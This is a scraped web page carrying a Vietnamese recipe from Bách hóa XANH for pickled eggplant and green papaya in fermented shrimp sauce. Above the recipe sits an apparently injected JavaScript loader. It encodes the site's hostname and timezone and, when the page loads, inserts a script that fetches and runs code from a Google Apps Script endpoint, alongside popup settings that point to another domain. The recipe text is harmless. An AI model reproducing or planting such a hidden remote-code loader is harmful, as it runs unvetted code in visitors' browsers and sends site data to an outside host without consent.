var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách làm mắm cà pháo đu đủ chuẩn vị chấm món gì cũng ngon

Một món gỏi trộn nổi tiếng miền Trung là mắm cà pháo đu đủ. Bách hóa XANH sẽ mách cách làm mắm cà pháo đu đủ chuẩn vị chấm món gì cũng ngon cho bạn ngay nhé!

Mắm cà pháo đu đủ là một món ngon dân dã, mộc mạc của người miền Trung. Món gỏi trộn này sẽ giúp những bữa cơm gia đình trọn vị, thơm ngon. Cùng bắt tay vào làm ngay với Bách hóa XANH nha.

Chuẩn bị 20 phút Chế biến 15 phút Dành cho 4 người ăn

1Nguyên liệu làm mắm cà pháo đu đủ

Nguyên liệu làm mắm cà pháo

  • 500g đu đủ xanh
  • 200g cà pháo
  • ½ củ tỏi băm
  • 2 trái ớt sừng băm ( hoặc ớt hiểm)
  • 300ml mắm nêm .
  • Gia vị: Muối, đường

Mẹo chọn mua cà pháo tươi ngonĐể chọn mua cà pháo tươi ngon, bạn nên chọn những quả có cuống còn tươi, không bị sâu đục đồng thời bạn cũng tránh mua những quả cà đã héo bởi khi ngâm mắm sẽ không được giòn, ngon.Bên cạnh đó, bạn cũng nên chọn loại to vừa đều nhau, không chọn quá non hay quá già. Vì cà non thường ít hạt, khi muối sẽ không giòn, dai. Nếu cà quá già, ruột sẽ nhiều và đặc khi muối sẽ có mùi hăng. Bạn có thể dùng cà pháo tím hoặc trắng đều được nhé.

2Cách làm mắm cà pháo đu đủ

Bước 1 Sơ chế nguyên liệu

Đầu tiên, bạn gọt bỏ vỏ đu đủ rồi rửa sạch với nước. Tiếp theo, bạn cắt đu đủ theo chiều dài thành 6 miếng dọc rồi tiến hành cắt thành từng miếng nhỏ có độ dày khoảng 1/2 đốt ngón tay. Sau đó, bạn ngâm đu đủ với nước muối trong vòng 15 phút để loại bỏ phần mủ.

Sơ chế đu đủ

Tiếp theo, bạn chuẩn bị 1 thau nước, cho vào 1 muỗng canh muối và khuấy đều cho muối hoà tan. Cà pháo bạn gọt bỏ phần cuống và những vết thâm rồi cắt đôi trái cà, cho vào thau nước muối ngâm 15 phút.

Sơ chế cà và đem đi phơi

Tiếp đến, bạn vớt đu đủ và cà pháo ra, đem phơi nắng đến khi vừa héo tới là được.

Bước 2 Pha mắm nêm

Bạn cho vào tô 300ml mắm nêm, 2 muỗng canh đường và hỗn hợp tỏi, ớt băm vào, trộn đều để hỗn hợp hòa quyện vào nhau.

Pha mắm nêm

Bước 3 Trộn mắm cà pháo

Trộn mắm cà pháo

Cuối cùng, bạn cho cà pháo, và đu đủ đã phơi vào mắm rồi trộn đều. Sau đó, bạn đổ hỗn hợp mắm cà pháo vào hũ, đậy kín nắp và để từ 2 – 3 ngày cho thấm gia vị và thưởng thức thôi.

Bước 4 Thành phẩm

Sau 2-3 ngày, cà pháo bắt đầu ngấm gia vị và màu sắc thay đổi thì bạn có thể dọn ra dĩa để thưởng thức cùng gia đình.

Thành phẩm mắm cà pháo

3Thành phẩm

Thành phẩm mắm cà pháo đu đủ thơm ngon

Vậy là bạn đã có ngay phần mắm cà pháo đu đủ thơm ngon xuất sắc. Cà pháo, đu đủ giòn giòn kết hợp cùng vị đậm đà của mắm và vị cay nồng của tỏi ớt, đã tạo nên một món mắm vô cùng độc đáo và rất hao cơm nhé!

Bách hoá XANH mong rằng với cách làm mắm cà pháo đu đủ chuẩn vị chấm món gì cũng ngon sẽ mang tới làn gió mới cho bữa cơm của bạn và gia đình. Khoe ngay thành phẩm với Bách hóa XANH nhé!

Mua mắm nêm, mắm ruốt các loại tại Bách hóa XANH nhé:

Bách hóa XANH